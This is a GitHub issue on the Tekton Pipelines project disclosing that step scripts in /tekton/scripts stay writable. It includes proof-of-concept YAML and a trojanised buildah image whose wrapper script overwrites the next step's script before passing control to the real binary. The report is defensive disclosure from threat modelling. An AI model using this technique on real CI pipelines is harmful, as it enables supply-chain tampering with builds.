### ISSUE TITLE
scripts shouldn't be writable after placement

### ISSUE THREAD

**Issue by 06kellyjac** [tektoncd/pipeline#4160]
# Expected Behavior

Expected the scripts to be uneditable after placement

`read-only file system: /tekton/scripts`

# Actual Behavior

You can edit scripts from within steps. If this modification is done ahead of a step executing and results in the modified behaviour.

# Steps to Reproduce the Problem

This was done using tekton deployed by the `0.22.0-1` edition of the operator

Apply and run the below task

```yaml
---
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
  name: overwrite-step
spec:
  steps:
    - name: hello
      image: busybox
      script: |
        MYFILE="$(find /tekton/scripts -name 'script-1-*')"
        echo "#!/bin/sh
        echo notworld" > "$MYFILE"
        chmod +x "$MYFILE"
    - name: world
      image: busybox
      script: |
        echo world
```

This can also affect real tasks such as the buildah one in the catalog either by having a malicious base image or maybe by injecting code in through the unescaped params

Any task with 2+ script steps and a method of changing what is ran in the first script block.
It has to be done from a preceeding script block as the script workspace/volume is only mounted when required for scripts

![build_logs](https://user-images.githubusercontent.com/9866621/129578844-24aca70a-5a15-4b5f-a228-505ffed55740.png)

![push_details](https://user-images.githubusercontent.com/9866621/129578887-393452f7-3cd7-4e82-9b08-8558692fc24d.png)

![push_logs](https://user-images.githubusercontent.com/9866621/129578901-16c87e0d-fe84-47f7-bddf-686c3e638d27.png)

`Dockerfile`

```Dockerfile
FROM quay.io/buildah/stable:v1.17.0
RUN mv /bin/buildah /bin/.buildah && yum install findutils -y
COPY ./entry-buildah /bin/buildah
```

`./entry-buildah`

```sh
#!/bin/bash
MYFILE="$(find /tekton/scripts -name 'script-1-*' 2>/dev/null)"
if [ "$MYFILE" != "" ]; then
  echo "#!/bin/sh
  echo something malicious like pushing the image elsewhere" > "$MYFILE"
  chmod +x "$MYFILE"
fi
exec -a "$0" "/bin/.buildah"  "$@"
```

Sample Pipeline

```yaml
---
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
  name: buildah-pipeline
spec:
  workspaces:
    - name: source
      description: The workspace containing the source code which is to be build, pushed and deployed
  tasks:
    - name: clone
      taskRef:
        name: git-clone
      workspaces:
        - name: output
          workspace: source
      params:
        - name: url
          value: https://github.com/kelseyhightower/nocode
    - name: buildah
      taskRef:
        name: buildah
      runAfter:
        - clone
      workspaces:
        - name: source
          workspace: source
      params:
        # Change to an image based on the Dockerfile above
        - name: BUILDER_IMAGE
          value: IMAGE
        # Change depending on your registry although the push shouldn't happen
        - name: IMAGE
          value: registry:12345/sample
        - name: TLSVERIFY
          value: "false"
```

# Additional Info

Scripts in `/tekton/scripts` should by default be mounted readonly as they shouldn't be modified at runtime.
Filesystem permissions alone can't be relied upon for preventing them being modified as images can be root by default or maybe require root.
Some users may also want to set the initContainer writing the scripts to a non-root user, this can also happen creating tekton resources in an openshift project.

If there is a usecase for changing the behaviour of following steps the following step should change it's own behaviour in an expected way upon reading a change in a volume.

This was discovered during some of our threatmodeling & issue hunting at https://github.com/controlplaneio/
